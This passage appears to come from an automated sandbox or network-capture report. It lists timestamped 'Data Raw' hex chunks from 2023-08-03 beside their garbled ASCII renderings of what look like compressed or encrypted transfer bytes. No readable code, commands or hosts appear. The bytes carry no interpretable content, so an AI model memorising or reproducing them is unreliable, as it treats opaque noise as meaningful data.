89 82 c1 4c 4a 8b b2 94 75 e6 f1 e1 21 f0 83 fc 27 0c 68 82 cc f6 0b 9d 80 6c b1 7e 9d a7 02 5e 61 fb 98 7d a5 ae bd 61 9d a1 c7 c5 9b 33 fe f3 c4 93 eb 05 12 87 e5 25 b9 7c 91 72 5c 67 60 03 99 d5 40 48 be 6b
                                                                                                                  Data Ascii: _V0@J9dv?@Y6yB+* 4+sVS=!028aI`U[1V5c(NM~=0Psk"0t&BbviZotLJu!'hl~^a}a3%|r\g`@Hk
                                                                                                                  2023-08-03 15:59:56 UTC1913INData Raw: f9 d4 63 98 2f f7 c5 14 e4 8a 7e 49 96 f8 6a 6f 78 39 72 34 c2 4e 40 16 2c 32 06 9c c6 70 74 46 e1 b9 00 85 e9 28 02 54 a1 ec 4f c9 77 3b c2 5a 80 ae bd f1 c3 8d 97 18 54 38 1f 78 2d 1e e5 b4 2f 86 dc a4 cb 83 3c 8f 89 69 82 96 80 99 61 2c 94 05 8e b8 ef 4b 9e 88 8d c0 5e 11 7d 76 4f 29 a2 57 46 72 51 08 89 25 94 37 83 f4 45 9b 3f 93 3f ed 7b bb 79 d1 74 3c 9c c6 35 74 75 91 15 11 e8 9b d3 ab bb 28 b0 59 c1 7a 47 08 58 b2 52 ca 44 38 c8 63 3e 93 b9 b2 72 9a 38 fc 5d e3 13 84 2c 9f 1d c3 c0 05 35 29 52 f8 62 1e 2b a7 a1 09 c4 dd 0e 39 ce 14 42 6c 49 25 1d ac 0f db 6e bc cf b9 9c cc c4 7e de 07 7c 5e bd 2e 04 22 67 f1 f7 4a 4a 70 65 92 97 f4 56 11 a9 27 04 d6 b6 59 6b 51 9c 83 34 ed 57 d9 29 16 9f 64 65 e3 cb a4 f1 59 ae 73 95 18 ad 84 17 96 21 c2 da 08 56
                                                                                                                  Data Ascii: c/~Ijox9r4N@,2ptF(TOw;ZT8x-/<ia,K^}vO)WFrQ%7E??{yt<5tu(YzGXRD8c>r8],5)Rb+9BlI%n~|^."gJJpeV'YkQ4W)deYs!V
                                                                                                                  2023-08-03 15:59:56 UTC1929INData Raw: ea f6 28 13 c1 00 4f 77 e6 d9 75 00 eb 41 56 bf c4 47 38 c8 44 ae f1 cf 1b 77 5e 39 8f fd 46 00 ca 2e 38 16 ed 09 02 99 99 29 78 f0 d1 5a 2e 8e 10 c2 98 c2 49 8a 9f 3c af 34 83 dd 20 14 95 d7 21 b0 86 ce a4 34 7a 66 a5 ff f0 79 2d a4 52 6e da db a1 91 d1 42 8e 21 13 b8 2e 60 cc bc bb 77 d8 43 c9 86 f6 d8 18 80 54 19 b8 15 7a 62 2d 70 47 5f c3 c5 e3 59 58 3b 32 a9 6a 45 94 81 42 1b 07 98 43 c3 05 00 cb ea e9 41 31 e8 8e 94 02 00 4e d9 ab 6f 96 35 8b df ca ce a7 64 53 45 83 0b 64 fd 25 0b 20 41 7b 2d a7 ef 37 4b 98 f8 af 64 ab d1 32 54 16 2d 02 17 42 b6 51 f4 0a 00 5c d7 a8 a7 b2 43 fe 4a fd a9 3e de 58 d4 3f 76 5a 6f 22 5f 9b a5 3e 43 90 23 7c cf c9 7f ae cb df 98 11 da f6 e0 e7 dc 69 35 2c d0 ae 5b 6e 79 35 06 fe 8d 6f e6 50 1c b6 dc d8 f5 a2 df 8f 25 53
                                                                                                                  Data Ascii: (OwuAVG8Dw^9F.8)xZ.I<4 !4zfy-RnB!.`wCTzb-pG_YX;2jEBCA1No5dSEd% A{-7Kd2T-BQ\CJ>X?vZo"_>C#|i5,[ny5oP%S
                                                                                                                  2023-08-03 15:59:56 UTC1945INData Raw: 3a 27 97 d4 00 36 81 27 fd 24 7e fc af 23 07 f2 80 31 5b 60 f5 2c 04 2a 9c 7b 42 42 d2 c0 c5 e2 4d 06 80 f7 bc 1d 7f e7 d0 00 17 b6 71 c0 a2 97 d6 09 ef 46 75 0f 28 94 03 2c 28 17 77 d9 8e 6d d3 35 db 67 4c b3 6e f1 3c 97 dd 7b 66 89 15 cb 6d e4 10 f2 62 40 67 3e a0 a6 2a 86 a0 1c d3 50 fb 83 f5 68 98 81 a7 c4 bd 57 10 8a 0f b6 8f ee 03 0e ac 71 df 09 ff 3d 98 eb 0d e6 ed b2 58 c4 e5 fa 87 95 66 5b da 58 2e b6 58 b0 79 2d 6c 17 5c 59 82 c7 e9 9d 09 96 a4 08 50 fe cd 4b ba 6b 5b 34 c2 86 9c aa 20 38 79 0c 5b c9 29 9f 96 f0 06 38 1e 5e 6a f5 c1 d6 0b b0 be 13 17 17 ff 04 a5 3b 17 39 fb c0 1c b7 66 44 5f b7 35 f8 0e 41 1e 39 d4 a9 5a 65 64 26 25 1d 1f 7f 10 f0 53 68 9b 93 24 bb 66 05 10 84 9e 71 53 cd e5 20 dc 94 38 1a af 0b dc 90 fe 78 66 98 51 b8 8d 49 fb
                                                                                                                  Data Ascii: :'6'$~#1[`,*{BBMqFu(,(wm5gLn<{fmb@g>*PhWq=Xf[X.Xy-l\YPKk[4 8y[)8^j;9fD_5A9Zed&%Sh$fqS 8xfQI
                                                                                                                  2023-08-03 15:59:56 UTC1961INData Raw: 9e c6 07 99 82 1e 8a be 2d 12 24 29 32 87 42 2c f8 4b a5 a2 72 a9 ab a2 98 af 73 19 5e b0 14 e2 7c f8 59 0c 7a c1 8f d4 bd f8 4e 6c 8b bd b2 9b d0 6b 25 eb 72 d6 fc b7 2c 9d 51 8d 4e df 43 54 92 8b 4d 25 0a 44 a8 c9 c0 01 77 f1 51 c9 06 09 35 0f 54 8a 4f ef db 24 17 10 c5 6d b1 59 59 23 37 67 6c 1b 0e 66 30 06 ea ee 87 64 74 8a d5 90 af d8 1b f2 eb 5e ad 28 e6 69 80 4b 2f e1 d4 54 22 55 91 fe f5 a7 c3 ce b1 a4 58 55 d1 1f 25 d9 e9 7b 89 77 df e0 f6 93 7d 97 0c 41 6c 95 19 fa a5 06 f5 ad 35 8f 85 68 ce 1d a5 94 9d 38 71 b2 18 28 85 63 4b 09 1b 8a 5e 0e 8c 4c 44 2f d7 42 d4 5f 9a aa 1e 0c 50 f3 76 bb 01 3a 62 df bb d8 8c 88 25 51 38 c6 b7 cb 27 8f 86 1f 40 3f 76 f0 ab e1 46 f3 b3 41 a4 05 4f bb 0f 27 48 6f dd 6e f8 81 57 d5 ab b5 6e e6 90 84 e8 c2 50 a1 de
                                                                                                                  Data Ascii: -$)2B,Krs^|YzNlk%r,QNCTM%DwQ5TO$mYY#7glf0dt^(iK/T"UXU%{w}Al5h8q(cK^LD/B_Pv:b%Q8'@?vFAO'HonWnP
                                                                                                                  2023-08-03 15:59:56 UTC1977INData Raw: ce 6a 70 c9 ea e7 a5 27 1d 6f f1 7c 39 21 99 cd b8 21 b5 91 2c be 97 19 b1 aa 4b 64 00 08 d5 0f 88 e9 c8 52 38 3f be 33 37 fb 5a 52 30 18 2a 64 10 12 0a 9b 67 51 1d 61 95 df 9b c8 18 cd 17 f7 64 9a 21 bb e1 62 89 c1 a6 91 10 f3 6d 32 bc 59 5b 1a e2 dc 4f 14 e5 68 1e dd fc e8 e0 ad 33 91 c1 5d a9 47 f0 19 4a 64 5f 2b ef e5 a1 04 7f dc 6d f8 60 67 1c e7 f7 f4 dd 84 31 a9 aa 8d 4b 57 4c 30 9d 59 2e da 8d 56 7d 8c 7d 94 21 0d 7a c4 7e 72 dd d3 2f fd 65 30 5a 90 3b 63 4e d5 05 79 3d 02 36 8f 9b c3 76 90 0a fa 34 2c e5 bd 9f 4c 3e f3 82 ba 2c ee 1e 53 e1 6f 66 29 c7 94 10 06 b5 cf 1f 7a ee 5b c9 b3 e8 80 f3 96 ac 32 38 61 05 9b 5d d0 1f 86 74 91 eb 93 0f ab 21 ed 49 53 e6 29 7b 60 13 3f 22 a2 6e 16 e1 4e c8 bb 3f ad 59 a3 90 af 34 ce ee 71 3d 46 19 75 b6 a1 b6
                                                                                                                  Data Ascii: jp'o|9!!,KdR8?37ZR0*dgQad!bm2Y[Oh3]GJd_+m`g1KWL0Y.V}}!z~r/e0Z;cNy=6v4,L>,Sof)z[28a]t!IS){`?"nN?Y4q=Fu
                                                                                                                  2023-08-03 15:59:56 UTC1993INData Raw: b3 ae a4 9a 95 62 a5 12 0c c3 8a d9 1c b2 78 ce a0 61 19 df 7b b5 4f 1e 0c 21 fd c9 50 84 e0 03 34 a1 1a b0 d3 9b c2 b3 36 40 1d fd 0b a3 17 1c 74 ed d8 b2 d0 72 99 d9 51 4f 8e 3d a6 2c a5 93 13 ff b6 fe 3f 89 ab 00 f3 71 db 80 36 fc 02 bd 02 b2 7d c1 fd 47 05 02 31 cd 28 4d 61 f1 16 51 c4 af 6f 6f 16 5b 05 fe dc b7 31 d2 07 c3 a7 5c d8 4d bb b2 2e fc 7d d7 af 9b dc e7 9d 1b 07 dd b2 e1 c5 ab 27 29 92 9f c0 06 1a 08 eb 3f f4 a1 90 9c c4 18 2b 0a 8a e7 e4 c4 05 73 29 0d 23 b1 47 e9 a4 57 d1 c9 64 3b fa 53 28 ad c9 70 9b b6 0c b5 c8 9e 85 8e 7d 1d 1e 74 e1 74 80 3f 65 a0 55 79 4b f0 e4 30 38 12 bb 1c 10 4e aa 35 e8 e0 56 b9 a9 47 08 b7 20 3a d8 ef e5 99 50 39 bf 88 da cf 59 67 ed 43 e4 fa 30 cd 97 9b cf 4f 54 91 c8 3b 5f 35 80 7c 0f b0 ed 55 b0 6b f0 8c 08
                                                                                                                  Data Ascii: bxa{O!P46@trQO=,?q6}G1(MaQoo[1\M.}')?+s)#GWd;S(p}tt?eUyK08N5VG :P9YgC0OT;_5|Uk
                                                                                                                  2023-08-03 15:59:56 UTC2009INData Raw: cd e6 a8 26 1b b4 24 d3 d5 cd 17 7c bd bd 55 1a 7b 05 7c 6a a7 b6 5b fa 50 bc fa 5b 21 c2 f0 5c 37 54 66 a8 7a f6 12 40 8f cb 72 72 bd 96 03 f9 cd cd ff a7 08 7b 01 d6 a8 9e 79 ac 30 92 77 f4 4d ba f2 66 3b 0b ad 5e b3 9f d8 07 17 9f 48 06 2f 6d 00 e5 b5 3f b9 89 6b ac 80 85 c2 08 bb aa a0 f8 13 6b 23 6c 24 44 10 e8 64 5c 57 52 31 09 f3 3c 9d 35 a0 42 5c 48 a4 50 85 4a af 24 c1 3b ab bf 00 7d 80 99 29 48 93 6c fd 6b 57 57 c7 2c 68 ba 10 ba 1c 50 dc 26 44 d6 5f 99 0e 0e 9c e8 32 96 8f 29 f4 3b ce a8 c8 3d a1 40 2f 0f e2 4e 9d dd b1 bd e7 71 2b 6b bd 50 af 87 a4 a2 cb b9 79 59 37 8b 03 d1 7f f6 1c 6d b4 99 d6 be c0 bf dc e2 c2 07 68 1f 08 7a 16 94 c4 2a 45 cd 90 c8 52 a4 5a d4 61 d1 26 1d 5d 31 ce d9 38 00 96 85 a3 03 ba 2c 65 b4 87 42 b2 a9 b6 29 0f 14 b7
                                                                                                                  Data Ascii: &$|U{|j[P[!\7Tfz@rr{y0wMf;^H/m?kk#l$Dd\WR1<5B\HPJ$;})HlkWW,hP&D_2);=@/Nq+kPyY7mhz*ERZa&]18,eB)
                                                                                                                  2023-08-03 15:59:56 UTC2025INData Raw: 9c 9e b1 2c 57 85 8c 4f d6 da 3f 8c 05 38 eb 74 f0 e6 4f e0 ca 03 d6 0c cb b3 e2 e4 a9 e9 5e d4 a9 18 3f 16 50 43 59 85 27 61 8e 43 2f 9d f4 f9 d3 2c d3 45 78 17 55 ed 10 48 86 87 16 c2 ee 36 a4 e9 66 73 39 cf 20 f4 21 69 98 b8 dd 52 4b bc 1c db ae 95 03 f1 fa cd 60 4f 31 a2 8c 62 87 79 e8 4b 2b 9e 98 c7 48 17 97 6b 82 f0 6c 27 2b c3 e3 bf 79 0f c9 cf 56 de 87 18 8e 57 24 bf 4b 4b e7 5c 7d 60 21 ad ca 0e 3c 04 37 27 dd ef 9a 20 9d e6 dd 76 a8 c7 f6 8c 33 5e 8f 57 02 66 11 03 4f 7c 2d 05 f3 16 df fb 65 88 4f 14 bd 5d aa 49 ce ee 29 33 18 c7 3d b2 10 e1 76 18 6e ff c3 6d 8d d9 7c a1 88 97 ef 8f 5d ac 43 e3 4c 0b 4f 31 b4 df ce 5c 8c 13 28 6f 63 ac bc 26 18 58 68 d6 4d cc bf 2c 06 8b de e5 0f 1e ee fc b4 82 f6 45 2c 1a f1 71 30 ac f1 f8 d4 fd d1 d1 03 1f 3b
                                                                                                                  Data Ascii: ,WO?8tO^?PCY'aC/,ExUH6fs9 !iRK`O1byK+Hkl'+yVW$KK\}`!<7' v3^WfO|-eO]I)3=vnm|]CLO1\(oc&XhM,E,q0;
                                                                                                                  2023-08-03 15:59:56 UTC2041INData Raw: 41 b5 6f c4 fc 9b bf 01 7e f2 b5 3a 07 28 fb 32 5d af 41 17 a0 ad 28 af 2b d1 d5 26 24 12 92 a3 07 e4 70 35 c8 ee 60 93 bb 3c d9 9e e8 dd f7 71 87 f9 f6 d4 da 89 92 63 66 62 e8 09 40 d5 ab fe b0 0a 21 90 78 a9 b5 86 b7 9b 13 86 e2 a3 e4 9b af 6f 8f 16 cf f2 5a 52 9e 39 6c 90 2f 00 c4 98 a6 17 61 b9 94 cb bc 1b 4b 22 d6 ff a5 51 bd 82 ad 7e 9a 9c 08 87 08 e1 27 66 b3 c4 de 4a 10 c5 9d ce 32 a1 14 af 38 49 da d6 53 b5 4b 3c 9e 0a b6 ef 76 0c f3 1f b0 1f 7d 23 27 d1 28 b9 89 20 c2 69 59 f8 43 29 76 b4 39 4d ab 0c a9 b7 88 3a 25 96 5a b5 2f 95 52 6a e0 20 f8 9c 70 e9 1a a7 e2 7d 37 fc 9e 48 79 33 95 a6 bd 1e cf bd f8 23 0b e3 b8 19 fc 82 28 58 ec 92 66 fe a4 0f 47 ad c5 f3 c1 88 b2 9f b8 15 34 ea eb 89 60 97 d8 d5 f6 19 4f 04 a3 e3 f3 a0 4c 73 2b 3a dc c5 8b
                                                                                                                  Data Ascii: Ao~:(2]A(+&$p5`<qcfb@!xoZR9l/aK"Q~'fJ28ISK<v}#'( iYC)v9M:%Z/Rj p}7Hy3#(XfG4`OLs+:
                                                                                                                  2023-08-03 15:59:56 UTC2057INData Raw: ef 79 20 70 73 a6 95 3c 91 0d 26 77 76 c7 55 ab e3 a8 a5 93 27 63 a5 60 91 ee a7 e4 58 56 a5 85 b4 39 62 9d c7 74 01 06 ec 6c b2 94 4c 2b 45 4a f3 ee 2e 2a 5b d2 d9 1b 74 67 ce 57 70 b9 ca 86 f4 36 20 b0 c6 c3 8e f5 93 a5 1b 6f cb 92 f3 ba 7a 80 a3 e5 0b ef be 1f 8a d1 97 22 e0 fa 39 37 5d f7 67 d9 3b 8a 25 c0 55 d4 72 08 07 1b 61 12 fb c8 cf c8 48 70 4c 21 00 b6 e3 0d 55 9f 6f b6 ea ed 07 44 3e 70 29 2b 5f db dd 74 a0 ab b4 4f f9 17 eb 7c c2 2c 39 b7 48 b2 ae ac 28 85 67 a4 17 7b 9c eb 1e 0a 8d 97 6c d0 91 81 1d a0 2c 6c e7 b8 79 70 4a 04 5d 9b e9 df 8f 20 a6 c2 4c b0 3b f3 27 55 5c fc bd 29 22 d5 e2 d3 5b ab a2 d9 b6 26 99 92 72 0c 3d af b0 36 c5 34 d9 77 c1 31 53 6c 2a fa c0 42 8a 51 69 41 bc ed e5 05 97 47 b4 49 87 4d 9c 8d c8 e2 de 22 5b 4f 50 69 fc
                                                                                                                  Data Ascii: y ps<&wvU'c`XV9btlL+EJ.*[tgWp6 oz"97]g;%UraHpL!UoD>p)+_tO|,9H(g{l,lypJ] L;'U\)"[&r=64w1Sl*BQiAGIM"[OPi
                                                                                                                  2023-08-03 15:59:56 UTC2073INData Raw: 56 25 2e 31 0a 99 9f 72 8f 06 b9 f6 0c af 8e 52 ae 40 bb 75 c7 39 8d 3e 74 7d a6 c9 2b d8 87 aa 64 de 14 37 49 3c 33 b9 6a 23 6e 56 bf bd 19 43 2e 3e b5 0e d2 6c 9f 8a a9 7a 6e 34 0f b5 c4 14 09 4c fc 52 95 c3 fd 35 53 c2 fc 81 3a 94 e4 18 8b fa f2 b4 a2 ef 08 5e 9f 21 bc 61 aa 44 56 b1 c8 8c cb 58 8b 32 e4 a0 47 44 72 3a 39 a2 74 6b db 26 88 3f fb 7a d8 76 3e c3 16 79 28 44 61 d9 1e bf 3f d4 4d f7 db c0 a9 2a af 35 67 37 e0 78 56 00 11 65 9a a1 4e c0 97 06 c5 78 94 c7 64 a5 a4 3d 2a bb 5f bb 39 ea 89 da a9 ce 14 fb 3f 19 a1 26 ec ec a5 db 4b ab 74 44 4b b7 b6 b1 05 ba e9 3f 79 2f 90 57 a3 03 6b fc 9d fd e6 82 8b 66 e1 71 3c 56 d1 7d aa 44 99 4e d9 48 97 72 43 46 cc 34 93 70 8d ce 48 43 64 4a f5 b8 80 13 b0 d5 fa 50 72 f2 f8 d4 af 27 12 52 51 fb 10 e6 5a
                                                                                                                  Data Ascii: V%.1rR@u9>t}+d7I<3j#nVC.>lzn4LR5S:^!aDVX2GDr:9tk&?zv>y(Da?M*5g7xVeNxd=*_9?&KtDK?y/Wkfq<V}DNHrCF4pHCdJPr'RQZ
                                                                                                                  2023-08-03 15:59:56 UTC2089INData Raw: b7 36 de 9f bc da 5f db 01 4b f5 16 28 26 46 96 62 d9 4f c2 d2 27 dc 84 8f 6b 62 20 9a 32 9b 57 a2 89 20 06 6a 9c c7 99 9b 45 ef 8d 44 86 1b 06 11 90 e0 35 8d 8f 42 bf eb 46 6f 3b 03 34 50 c1 7d 9c 2d b5 de f6 f0 74 a0 2e fa bd 05 e5 e8 3e aa ca db b9 e8 ac 9c 82 e3 b0 c5 67 13 d5 77 15 b4 a0 72 52 cd 92 4d 30 13 fd 75 44 01 1b 00 94 28 04 88 75 bb c8 78 9b 5a 04 87 d1 f5 6d 67 6f db 1f 58 39 ca 90 87 56 bb 19 0e fc a2 4b a3 19 c3 d5 79 ab 02 02 fb 30 75 76 48 d6 8f 76 04 35 9a 74 0b 9b 91 72 c0 6d 41 92 68 bd 63 30 d5 a0 bc 97 d5 68 d8 68 53 40 23 b2 da 29 bf 79 9e 68 42 d7 a8 93 b7 4a 35 ca 6d 9c 4d 9d 48 0b fd 81 49 8f 70 84 08 84 67 88 46 46 f0 e7 9b 75 8e 39 7c 44 d5 eb d3 91 88 7b e3 c6 4c 38 55 34 27 e7 84 4c e4 50 cb 76 67 e1 c8 11 6b a9 f9 f6 1c
                                                                                                                  Data Ascii: 6_K(&FbO'kb 2W jED5BFo;4P}-t.>gwrRM0uD(uxZmgoX9VKy0uvHv5trmAhc0hhS@#)yhBJ5mMHIpgFFu9|D{L8U4'LPvgk
                                                                                                                  2023-08-03 15:59:56 UTC2105INData Raw: 33 f3 7c 1e b6 7e 04 a8 22 64 b5 61 48 c2 fb b8 eb 7a 9d f9 3b a9 f6 7c 42 84 1a 80 99 93 5d 4d 8b 04 85 64 cf 4c e0 03 5a 0b 5b a0 4e 45 2f e6 55 74 24 95 c4 ca ea 7d 4a 26 32 75 0b 02 ba 9e 8b d1 6c f3 26 0c 6f 50 86 28 95 7c 53 d0 ea a9 45 65 33 8d c0 77 1f f2 42 92 f8 e1 32 57 1a 41 38 b9 d5 19 e3 54 32 f1 3f 8c da 41 05 1c 8f 91 24 56 3c 6c d8 25 47 cb 6e ac 82 69 b8 38 12 31 01 b0 0d 50 70 f1 a9 3d d0 44 13 2a 4e 55 76 48 2a 34 8c a4 d9 10 d7 90 59 3d f3 27 f8 c3 08 ca 78 a7 e8 83 bf c2 6a 38 e8 92 9a e4 84 d6 ec b5 25 21 b8 82 a9 86 b0 93 3a 0d 20 81 0b 3b 56 75 a8 58 85 9d 5c d1 26 af 47 51 fd 34 b6 67 f3 4c e5 61 11 3b 00 9d d8 bb 5f f0 42 73 b6 a9 58 84 4f 3a 75 36 2f 1d 44 74 1d d8 1f c0 02 12 c4 b2 6a f6 14 4f 65 88 35 e8 e1 8d a1 b8 2d 43 4f
                                                                                                                  Data Ascii: 3|~"daHz;|B]MdLZ[NE/Ut$}J&2ul&oP(|SEe3wB2WA8T2?A$V<l%Gni81Pp=D*NUvH*4Y='xj8%!: ;VuX\&GQ4gLa;_BsXO:u6/DtjOe5-CO
                                                                                                                  2023-08-03 15:59:56 UTC2121INData Raw: 9f 59 41 bb 1c 66 a3 1b 98 c5 d2 96 e5 4d 26 5d 7f 22 16 bc 87 69 33 b9 be 41 6f a3 60 09 db a5 b5 87 72 bc 25 d9 4e 57 f1 d5 56 83 95 00 42 dd 6b 4a 6a d3 80 3f b0 b4 9a 0f 9b 68 47 03 7e 90 09 d0 7e 3a 83 d1 ac bc 66 03 7a 30 96 af 91 73 79 8d 71 9a a2 60 96 38 51 19 be e0 56 9f 03 15 1a 6c 56 80 43 d4 c2 bf f2 54 32 a5 81 9a 51 ee c9 8f 2e 1f 21 f9 8b ed 6b 3a 0e b2 1b a7 32 6f d4 d1 5b 6d e8 71 9a 4c fd 3f 1c e5 c4 59 bc e7 c6 9a a4 c8 a5 73 7c c6 b6 03 07 db 6e 36 38 d7 79 52 e9 3f 6e 3b a4 a8 2e 9c 69 91 32 e4 eb fb 53 78 94 9d 75 17 f5 8c 42 fb 92 cd 94 f9 cc c5 ad 1e 53 9a f4 4f e8 a3 c1 b3 6a 27 ac 6c e9 0f bd 78 93 cb c0 2a bb 62 4a 71 47 40 7d 1d 2f 4f e4 4d 43 40 ba 69 d3 eb 7a 9d a7 01 00 a0 8c c3 e2 37 bc db 26 4e 03 d2 92 aa cd 3f 34 4b 15
                                                                                                                  Data Ascii: YAfM&]"i3Ao`r%NWVBkJj?hG~~:fz0syq`8QVlVCT2Q.!k:2o[mqL?Ys|n68yR?n;.i2SxuBSOj'lx*bJqG@}/OMC@iz7&N?4K
                                                                                                                  2023-08-03 15:59:56 UTC2137INData Raw: 0a 96 ed ee ef 9a fe 29 5a 2c 64 8b 27 8b 24 f6 41 54 00 ce 6a 91 1d 32 29 eb f0 19 dc e8 fc c2 ad 16 fd 28 fe 8c c4 03 bd 24 05 28 08 70 ff d4 b1 0d 17 75 e4 be a1 93 b2 2c 32 9b e0 1c 35 a3 97 0c 6d 2b 29 9d a0 12 28 b9 26 c2 f0 76 05 05 95 c3 5c 4d ad 1e e4 97 fa 61 3d ae 08 57 ee 3b a4 92 35 39 55 f2 04 25 d1 16 46 02 92 c9 88 68 8f fc ca 6f c0 71 97 54 c5 56 62 28 80 14 25 6d fe c6 05 20 29 51 3e 6e 43 04 5e 39 b5 9b b4 2c 6e 50 76 5f 83 b8 af 8a 52 cf 2b fe 70 54 71 da e5 5b 78 b5 91 fa 09 3a 2b 34 c2 4c 1d ad dc 41 80 44 63 e4 ab f6 7e 5b c6 bc 3d 7f 94 1a 4e de 37 30 b6 b8 ad 58 8f fb 28 c2 22 21 96 5d 4c 74 0a b8 fc 8c 62 74 08 99 8c e0 05 c1 e6 e7 ad e1 4c 87 e4 0c 75 ff 15 69 e8 33 e0 ea 7a 2a b1 b0 8a 8c ba 0c 5b f7 f2 fe 7d 1f 8a a4 c7 d7 fb
                                                                                                                  Data Ascii: )Z,d'$ATj2)($(pu,25m+)(&v\Ma=W;59U%FhoqTVb(%m )Q>nC^9,nPv_R+pTq[x:+4LADc~[=N70X("!]LtbtLui3z*[}
                                                                                                                  2023-08-03 15:59:56 UTC2153INData Raw: b0 da 6d 87 4d b1 86 8b 80 f9 85 2d e0 29 f8 71 2a 0a 44 4f 0c 49 83 c3 c8 0a 7a 31 0b 3c 4c e7 83 a8 d0 6e f6 74 73 d3 c2 de 7d d2 92 f4 91 7f d7 24 54 3a fc 34 3e 18 35 6d b3 fb ad 1d 77 eb de 65 2b e4 66 20 20 2a e5 04 77 0d 88 af c2 be ad 3b 7f 32 10 c7 f8 d4 33 ab 40 52 4b a9 27 e3 55 4a 44 da 26 79 3e 42 64 9f 30 de 50 d8 96 4c ca 45 39 0e 78 6d be ec 7a 74 43 19 e1 0f 64 3e 7f d9 2b 23 fb 9d 42 4a 54 e4 42 cc c6 50 92 e3 af 75 80 d8 49 a2 7c 60 41 52 8c f2 2b c6 a2 26 f4 ce af 21 7d fe d7 c6 2b 6b 14 43 80 6a e8 71 da 87 33 6a 69 23 9e 37 44 07 c8 86 aa d0 84 19 3e 30 c3 7f e6 26 30 c3 bf 25 d1 97 01 9a 31 d3 0c d7 0e bd ed cb 1b b5 60 7c ef 1f d7 41 cf df f8 40 3f 5c f6 d1 82 70 9d f4 65 ca f8 d8 a4 bb 17 f0 a1 25 2f 45 f7 7d df 09 8d 59 77 f4 c5
                                                                                                                  Data Ascii: mM-)q*DOIz1<Lnts}$T:4>5mwe+f *w;23@RK'UJD&y>Bd0PLE9xmztCd>+#BJTBPuI|`AR+&!}+kCjq3ji#7D>0&0%1`|A@?\pe%/E}Yw
                                                                                                                  2023-08-03 15:59:56 UTC2169INData Raw: 0c fd 58 aa 59 9b ae fe 4b df b1 c5 7f 52 1c 10 7e a8 7f 22 84 79 3d f7 48 81 d2 d0 ad a1 f6 42 db d3 11 3a b3 86 55 2f 9b 73 c9 78 22 e2 9d ae ae 3e 4d 98 dc 30 54 e9 e8 58 3b e9 18 9d d4 53 0d cd a3 5f 66 6a 5d 0f 37 91 98 a6 0d 00 83 98 84 db b2 fb 5e 11 e8 ac ef 25 ae cb 1f a2 be 0b 64 ea 4b 58 31 8c 87 fa 1d b2 84 08 a9 0f ae 81 a1 b0 9b ef 4c 16 0d 2d 07 7a e4 f3 d5 3e e0 a6 3a 02 83 66 02 de 50 a7 09 51 ec d4 b8 d5 92 d7 c1 75 76 80 74 a7 9c 04 d0 ef 54 28 03 94 c3 91 70 25 65 b9 a5 77 4b 45 72 8e 4b 8c 17 af 67 b8 a2 90 d9 2f f4 60 39 67 ac 4f ab 14 06 32 0f 91 f0 cb 8c 7e bd 05 72 2d 97 d2 9e 69 44 d6 7b 99 3f ae 69 9c 24 c6 1c 03 92 93 bc fe b3 e9 76 4f 24 b9 3f b7 77 45 f8 0f c3 65 4a c3 db 2e b5 db 26 a1 b5 97 35 a9 17 3c b2 de 65 1d 75 2d fe
                                                                                                                  Data Ascii: XYKR~"y=HB:U/sx">M0TX;S_fj]7^%dKX1L-z>:fPQuvtT(p%ewKErKg/`9gO2~r-iD{?i$vO$?wEeJ.&5<eu-
                                                                                                                  2023-08-03 15:59:56 UTC2185INData Raw: b6 66 c3 f5 d3 68 28 44 d8 f0 de 62 ad 70 df 29 db f6 ec 8b 3d 98 1d 2a 3c 22 ec 14 41 32 43 35 26 5d d7 87 fb 9f c2 44 be 43 e4 94 9e 94 cb e7 b6 11 c3 83 31 22 49 6a b6 12 bb 62 ce 13 ce f8 23 4f 05 2a 48 fd 48 b8 2c ec 91 86 af a9 53 f6 b7 2a b3 8c c4 1e e6 7f 58 23 3a 3f 91 0b e1 5d c7 22 fe 5c dc 25 69 39 ec 75 07 4a 26 2b 36 f0 35 0c b0 c4 ed 4e 10 ff 29 c4 26 86 94 9d 91 b2 d5 cd cb 13 7c 31 9e 49 06 8c 93 ac e0 fa c0 df 75 58 33 9d a6 f9 80 02 0a 07 af 52 ca f4 5a 50 95 cd 03 e1 a5 e6 56 e2 8b 05 23 0c 11 52 b5 62 b0 53 11 a5 d0 1c 85 7a fa f5 2a ad 87 81 b7 d1 32 a0 7a b5 ce a4 9a 75 1d 1a ff c6 22 67 5d e1 de 4a 22 ee 80 c4 d1 13 86 ec 47 e0 20 f4 0a ec 30 ed 79 a2 0c 21 ca 92 0d 9a d7 21 0a be 09 5b be 31 bb e8 68 67 2c bd 25 1f f4 18 99 f1 43
                                                                                                                  Data Ascii: fh(Dbp)=*<"A2C5&]DC1"Ijb#O*HH,S*X#:?]"\%i9uJ&+65N)&|1IuX3RZPV#RbSz*2zu"g]J"G 0y!![1hg,%C
                                                                                                                  2023-08-03 15:59:56 UTC2201INData Raw: a7 d3 c7 44 2a fd 17 a5 df b4 60 12 ae f0 97 db 14 ea 7f 96 bc c0 94 e9 82 d6 b6 1f cb ec ef 65 16 7e b0 ef 47 c8 d5 5d 85 27 05 ac e3 40 a6 d0 6b 93 3d a3 80 fe a4 c9 f4 f2 f3 60 aa 41 4d 64 c4 32 16 76 dc e8 c3 94 7d ba 08 87 e6 83 08 2f 4f 0a 47 7c 34 de 21 48 d8 bb 65 3f 88 63 61 6e 3f 15 4a 68 84 bb 96 9d a7 21 a6 91 78 05 f8 a1 98 4e f3 cc 87 3d ae 55 08 a6 c1 78 bb fd 2a 89 d6 9a ae 40 76 57 88 61 bc 35 c5 99 68 bf 43 06 02 16 73 d5 f7 8a 0a 6f 8e 00 ef b9 9c 54 cd c8 9e 07 62 20 48 c0 9b 5a 0a a6 c9 56 af d6 7a af 9e 28 b2 6d 68 a7 a3 f9 53 ec 9d c2 54 9c 26 4f e2 96 db a9 84 55 3e f2 10 31 55 23 31 92 ae 00 2b b0 62 64 85 b8 6e 80 05 c4 ef c8 23 85 10 13 1b 4a 90 0d 0a b7 71 a5 6f d5 81 58 75 5f 0f f5 eb 43 28 93 03 0c ed 40 ea 82 eb 8b 91 84 9f
                                                                                                                  Data Ascii: D*`e~G]'@k=`AMd2v}/OG|4!He?can?Jh!xN=Ux*@vWa5hCsoTb HZVz(mhST&OU>1U#1+bdn#JqoXu_C(@
